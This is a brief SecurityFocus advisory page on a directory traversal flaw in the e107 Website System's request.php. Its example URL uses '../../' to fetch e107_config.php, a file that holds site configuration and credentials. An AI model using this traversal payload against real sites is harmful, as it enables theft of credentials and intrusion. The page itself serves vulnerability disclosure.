info
discussion
exploit
solution
references
e107 Website System Request.PHP Directory Traversal Vulnerability
An exploit is not required. The following example was provided:
http://www.example.com/request.php?../../e107_config.php
Privacy Statement
Copyright 2010, SecurityFocus
